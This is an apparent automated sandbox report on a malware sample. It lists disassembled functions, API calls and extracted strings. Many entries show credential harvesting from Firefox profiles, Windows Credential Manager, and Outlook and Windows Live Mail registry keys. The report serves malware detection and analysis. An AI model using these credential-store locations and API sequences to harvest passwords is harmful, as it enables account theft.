                                                            • sprintf.MSVCRT ref: 0040A9F0
                                                            • _mbscpy.MSVCRT(00000000, nowrap), ref: 0040AA37
                                                            • sprintf.MSVCRT ref: 0040AABE
                                                            • _mbscat.MSVCRT ref: 0040AAED
                                                              • Part of subcall function 00410FD3: sprintf.MSVCRT ref: 00410FF7
                                                            • _mbscpy.MSVCRT(?,?), ref: 0040AAD2
                                                            • sprintf.MSVCRT ref: 0040AB21
                                                              • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                              • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,75D50A60,00000000,?,?,0040A7BE,00000001,0044CBC0,75D50A60), ref: 00406D4D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                            • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: sprintf$memset$_mbscpy
                                                            • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                            APIs
                                                              • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                              • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                              • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                              • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                              • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                              • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                              • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                              • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                            • strlen.MSVCRT ref: 0040F139
                                                            • strlen.MSVCRT ref: 0040F147
                                                            • memset.MSVCRT ref: 0040F187
                                                            • strlen.MSVCRT ref: 0040F196
                                                            • strlen.MSVCRT ref: 0040F1A4
                                                            • memset.MSVCRT ref: 0040F1EA
                                                            • strlen.MSVCRT ref: 0040F1F9
                                                            • strlen.MSVCRT ref: 0040F207
                                                            • _strcmpi.MSVCRT ref: 0040F2B2
                                                            • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                            • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                              • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                              • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                            • String ID: logins.json$none$signons.sqlite$signons.txt
                                                            APIs
                                                            • memset.MSVCRT ref: 0040C3F7
                                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                            • strrchr.MSVCRT ref: 0040C417
                                                            • _mbscat.MSVCRT ref: 0040C431
                                                            • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                            • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                            • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                            Similarity
                                                            • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                            • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                            APIs
                                                            Similarity
                                                            • API ID: _strcmpi
                                                            • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                            APIs
                                                            • memset.MSVCRT ref: 00444612
                                                              • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                            • strlen.MSVCRT ref: 0044462E
                                                            • memset.MSVCRT ref: 00444668
                                                            • memset.MSVCRT ref: 0044467C
                                                            • memset.MSVCRT ref: 00444690
                                                            • memset.MSVCRT ref: 004446B6
                                                              • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                              • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                              • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                              • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                              • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                            • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                              • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                              • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                              • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                            • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                            • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                            • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                            • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                            • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                            Similarity
                                                            • API ID: memcpymemset$strlen$_mbscpy
                                                            • String ID: salu
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                            • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                            • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                            • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                            Similarity
                                                            • API ID: AddressProc$Library$FreeLoad
                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                            APIs
                                                              • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                            • strlen.MSVCRT ref: 00443AD2
                                                            • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 00443AE2
                                                            • memset.MSVCRT ref: 00443B2E
                                                            • memset.MSVCRT ref: 00443B4B
                                                            • _mbscpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00443B79
                                                            • RegCloseKey.ADVAPI32(?), ref: 00443BBD
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                                            • LocalFree.KERNEL32(?), ref: 00443C23
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00443C2C
                                                              • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                                            Strings
                                                            • Software\Microsoft\Windows Mail, xrefs: 00443B61
                                                            • Salt, xrefs: 00443BA7
                                                            • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                                                            Similarity
                                                            • API ID: _mbscpymemset$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                            • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                            APIs
                                                            • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                            • memset.MSVCRT ref: 0040F84A
                                                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                                                            • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                            • LocalFree.KERNEL32(?), ref: 0040F92C
                                                            • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                            • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                            Similarity
                                                            • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                            • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
                                                            APIs
                                                              • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                              • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,75D50A60,00000000,?,?,0040A7BE,00000001,0044CBC0,75D50A60), ref: 00406D4D
                                                            • memset.MSVCRT ref: 00403ECE
                                                            • memset.MSVCRT ref: 00403EE2
                                                            • memset.MSVCRT ref: 00403EF6
                                                            • sprintf.MSVCRT ref: 00403F17
                                                            • _mbscpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F33
                                                            • sprintf.MSVCRT ref: 00403F6A
                                                            • sprintf.MSVCRT ref: 00403F9B
                                                            Strings
                                                            • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403EA6
                                                            • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F11
                                                            • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F45
                                                            • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F95
                                                            • <table dir="rtl"><tr><td>, xrefs: 00403F2D
                                                            Similarity
                                                            • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                                            • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                            APIs
                                                            • sprintf.MSVCRT ref: 0040957B
                                                            • LoadMenuA.USER32(?,?), ref: 00409589
                                                              • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                              • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                              • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                              • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                            • DestroyMenu.USER32(00000000), ref: 004095A7
                                                            • sprintf.MSVCRT ref: 004095EB
                                                            • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                            • memset.MSVCRT ref: 0040961C
                                                            • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                            • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                            • DestroyWindow.USER32(00000000), ref: 0040965C
                                                            Similarity
                                                            • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                            • String ID: caption$dialog_%d$menu_%d
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040FE20), ref: 0040FFBF
                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040FFD8
                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040FFE9
                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040FFFA
                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0041000B
                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0041001C
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule
                                                            • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                            APIs
                                                              • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                            • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                            • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                            • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                            • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                            • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                            Similarity
                                                            • API ID: AddressProc$Library$FreeLoad
                                                            • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                            • API String ID: 2449869053-4258758744
                                                            • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                            • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                            • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                            • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                            APIs
                                                            • wcsstr.MSVCRT ref: 0040426A
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                            • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                            • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                            • strchr.MSVCRT ref: 004042F6
                                                            • strlen.MSVCRT ref: 0040430A
                                                            • sprintf.MSVCRT ref: 0040432B
                                                            • strchr.MSVCRT ref: 0040433C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                            • String ID: %s@gmail.com$www.google.com
                                                            • API String ID: 3866421160-4070641962
                                                            • Opcode ID: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                            • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                            • Opcode Fuzzy Hash: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                            • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                            APIs
                                                            • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409749
                                                            • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,?,?,00409862,00000000,?,00000000,00000104,?), ref: 00409759
                                                              • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                              • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,00000104,0044C52F,?,00001000,0045A448), ref: 00409355
                                                              • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                            • EnumResourceNamesA.KERNEL32(00000104,00000004,0040955A,00000000), ref: 0040978F
                                                            • EnumResourceNamesA.KERNEL32(00000104,00000005,0040955A,00000000), ref: 00409799
                                                            • _mbscpy.MSVCRT(0045A550,strings,?,00409862,00000000,?,00000000,00000104,?), ref: 004097A1
                                                            • memset.MSVCRT ref: 004097BD
                                                            • LoadStringA.USER32(00000104,00000000,?,00001000), ref: 004097D1
                                                              • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                            • String ID: TranslatorName$TranslatorURL$general$strings
                                                            • API String ID: 1035899707-3647959541
                                                            • Opcode ID: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                                            • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                            • Opcode Fuzzy Hash: a0ec869b2dd78c9688f5c4aeae5101ac8de8338f716e64c62a8758e97b5b0f37
                                                            • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                            APIs
                                                            • _mbscpy.MSVCRT(?,Common Programs,00410E5B,?,?,?,?,?,00000104), ref: 00410DB0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _mbscpy
                                                            • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                            • API String ID: 714388716-318151290
                                                            • Opcode ID: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                            • Instruction ID: efcd42a8463342e3d8d24718a8e89ec7c05b938a093e831c325fe23e20e40f83
                                                            • Opcode Fuzzy Hash: 418df8c3ee7b9207f67be79dd48ad84a468613dbb13fd2c9c1173f8c90f4c556
                                                            • Instruction Fuzzy Hash: 3FF0D0B1EA8B15E434FC01E8BE06BF220109481B457BC42E7B08AE16DDC8CDF8C2601F
                                                            APIs
                                                            • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                            • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                            • SelectObject.GDI32(?,?), ref: 0040CACC
                                                            • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                            • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                              • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                              • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                              • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                            • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                            • SetCursor.USER32(00000000), ref: 0040CB35
                                                            • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                            • SetFocus.USER32(?), ref: 0040CB92
                                                            • SetFocus.USER32(?), ref: 0040CC0B
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                            • String ID:
                                                            • API String ID: 1416211542-0
                                                            • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                            • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                                                            • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                            • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                            • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                            • API String ID: 2360744853-2229823034
                                                            • Opcode ID: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                            • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                            • Opcode Fuzzy Hash: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                            • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                            APIs
                                                              • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                            • memset.MSVCRT ref: 00402C9D
                                                              • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                            • RegCloseKey.ADVAPI32(?), ref: 00402D9F
                                                              • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                            • memset.MSVCRT ref: 00402CF7
                                                            • sprintf.MSVCRT ref: 00402D10
                                                            • sprintf.MSVCRT ref: 00402D4E
                                                              • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
                                                              • Part of subcall function 00402BD1: RegCloseKey.ADVAPI32 ref: 00402C55
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Closememset$sprintf$EnumOpen
                                                            • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                            • API String ID: 1831126014-3814494228
                                                            • Opcode ID: e8f6eaf9c13d0249a01ea98d471cb1a8874e737a8319c7d0390265d86dcdbfa3
                                                            • Instruction ID: 079f63aacd2b880b2e0576cff081af09170d207e8fe08998d1b5f7116231a607
                                                            • Opcode Fuzzy Hash: e8f6eaf9c13d0249a01ea98d471cb1a8874e737a8319c7d0390265d86dcdbfa3
                                                            • Instruction Fuzzy Hash: C7313072D0011DBADB11DA91CD46FEFB77CAF14345F0404A6BA18B2191E7B8AF849B64
                                                            APIs
                                                            • strchr.MSVCRT ref: 004100E4
                                                            • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                              • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                              • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                              • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                            • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                            • _mbscat.MSVCRT ref: 0041014D
                                                            • memset.MSVCRT ref: 00410129
                                                              • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                              • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                            • memset.MSVCRT ref: 00410171
                                                            • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                            • _mbscat.MSVCRT ref: 00410197
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                            • String ID: \systemroot
                                                            • API String ID: 912701516-1821301763
                                                            • Opcode ID: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                            • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                            • Opcode Fuzzy Hash: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                            • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                            APIs
                                                              • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                            • memset.MSVCRT ref: 0040301E
                                                              • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                            • memset.MSVCRT ref: 0040306B
